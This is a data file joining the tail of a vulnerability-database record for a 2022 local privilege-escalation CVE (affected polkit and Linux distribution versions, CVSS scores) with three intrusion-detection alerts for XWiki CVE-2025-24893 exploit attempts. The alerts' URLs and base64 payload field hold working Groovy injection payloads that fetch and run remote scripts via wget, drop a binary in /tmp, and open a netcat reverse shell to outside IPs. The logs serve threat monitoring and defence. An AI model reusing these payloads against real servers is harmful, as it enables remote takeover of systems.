"cpe:2.3:a:polkit_project:polkit:0.116:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.117:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.118:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.119:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.120:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.5:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.6:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.7:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.8:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.91:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.92:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.93:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.94:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.95:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.96:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.97:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.98:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.99:*:*:*:*:*:*:*",
"cpe:2.3:a:polkit_project:polkit:0.9:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.6:*:*:*:*:*:*:*",
"cpe:2.3:a:redhat:enterprise_linux_server_update_services_for_sap_solutions:7.7:*:*:*:*:*:*:*",
"cpe:2.3:a:siemens:sinumerik_edge:3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:command_center:1.0:update3_build5871:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:starwind_hyperconverged_appliance:-:*:*:*:*:*:*:*",
"cpe:2.3:a:starwindsoftware:starwind_virtual_san:v8:build14338:*:*:*:*:*:*",
"cpe:2.3:a:suse:enterprise_storage:7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:suse:linux_enterprise_high_performance_computing:15.0:sp2:*:*:-:*:*:*",
"cpe:2.3:a:suse:manager_proxy:4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:suse:manager_server:4.1:*:*:*:*:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*",
"cpe:2.3:o:canonical:ubuntu_linux:21.10:*:*:*:-:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:-:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:advanced_virtualization:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:coreos:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_ibm_z_systems_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_big_endian:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian:8.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_power_little_endian_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_for_scientific_computing:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:x86:*",
"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.3:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.7:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_aus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_eus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:7.7:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_tus:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.1:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.2:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_server_update_services_for_sap_solutions:8.4:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*",
"cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:x64:*",
"cpe:2.3:o:siemens:scalance_lpe9403_firmware:-:*:*:*:*:*:*:*",
"cpe:2.3:o:suse:linux_enterprise_desktop:15:sp2:*:*:*:*:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:-:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:*:sap:*:*",
"cpe:2.3:o:suse:linux_enterprise_server:15:sp2:*:*:business_critical_linux:-:*:*",
"cpe:2.3:o:suse:linux_enterprise_workstation_extension:12:sp5:*:*:*:*:*:*"
],
"impact": {
"baseMetricV3": {
"cvssV3": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9
},
"baseMetricV2": {
"cvssV2": {
"version": "2.0",
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"accessVector": "LOCAL",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2
},
"severity": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 10,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
},
"temporalMetricV3": {
"cvssV3": {
"version": "3.1",
"vectorString": "E:H/RL:X/RC:C",
"exploitCodeMaturity": "HIGH",
"remediationLevel": "NOT_DEFINED",
"reportConfidence": "CONFIRMED",
"temporalScore": 7.8
}
},
"temporalMetricV2": {
"cvssV2": {
"version": "2.0",
"vectorString": "E:H/RL:ND/RC:C",
"exploitability": "HIGH",
"remediationLevel": "NOT_DEFINED",
"reportConfidence": "CONFIRMED",
"temporalScore": 7.2
}
},
"epss": {
"epss_score": 0.04106,
"epss_percentile": 0.85572
}
},
"related_attack_patterns": [
{
"lang": "en",
"capec_id": "CAPEC-100",
"capec_name": "Overflow Buffers",
"capec_url": "https://capec.mitre.org/data/definitions/100.html"
}
],
"publishedDate": "2022-01-28T20:15Z",
"lastModifiedDate": "2022-10-25T16:59Z",
"documentGenerationDate": "2022-11-15T15:26Z"
}
]
}
[
{
"src_ip": "193.26.115.195",
"src_port": 47922,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D",
"http_user_agent": "Mozilla/5.0 (bang2013@atomicmail.io)",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-07T07:58:51.064Z"
},
{
"src_ip": "172.206.196.45",
"src_port": 51864,
"src_country": "US",
"dst_country": "CA",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "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",
"http": {
"url": "/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22wget%20http://90.156.218.31:8080/Vky0b4J9K3/x640%20-O%20/tmp/f1c5f%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20",
"http_user_agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4.1 Safari/605.1.15",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-11-01T12:14:26.712Z"
},
{
"src_ip": "18.228.3.224",
"src_port": 37348,
"src_country": "BR",
"dst_country": "FR",
"cve": "CVE-2025-24893",
"signature_id": 12700499,
"signature": "VULNCHECK XWiki CVE-2025-24893 Exploit Attempt (Groovy)",
"category": "Web Application Attack",
"severity": 1,
"payload": "R0VUIC94d2lraS9iaW4vZ2V0L01haW4vU29sclNlYXJjaD9tZWRpYT1yc3MmdGV4dD0lN0QlN0QlN0IlN0Jhc3luYyUyMGFzeW5jJTNEZmFsc2UlN0QlN0QlN0IlN0Jncm9vdnklN0QlN0QlMjJidXN5Ym94JTIwbmMlMjAxOC4yMjguMy4yMjQlMjA4NDQzJTIwLWUlMjAvYmluL2Jhc2glMjIuZXhlY3V0ZSUyOCUyOSU3QiU3Qi9ncm9vdnklN0QlN0QlN0IlN0IvYXN5bmMlN0QlN0QgSFRUUC8xLjENCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBweXRob24tcmVxdWVzdHMvMi4zMi40DQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUsIHpzdGQNCkFjY2VwdDogKi8qDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg==",
"http": {
"url": "/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2018.228.3.224%208443%20-e%20/bin/bash%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D",
"http_user_agent": "python-requests/2.32.4",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-31T10:16:30.275Z"
}
]

